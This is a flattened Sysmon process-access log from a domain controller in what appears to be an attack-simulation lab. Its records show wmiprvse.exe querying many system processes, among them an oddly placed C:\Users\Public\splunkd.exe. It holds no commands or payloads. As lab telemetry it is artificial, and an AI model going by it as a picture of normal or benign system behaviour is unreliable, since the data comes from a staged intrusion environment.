15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 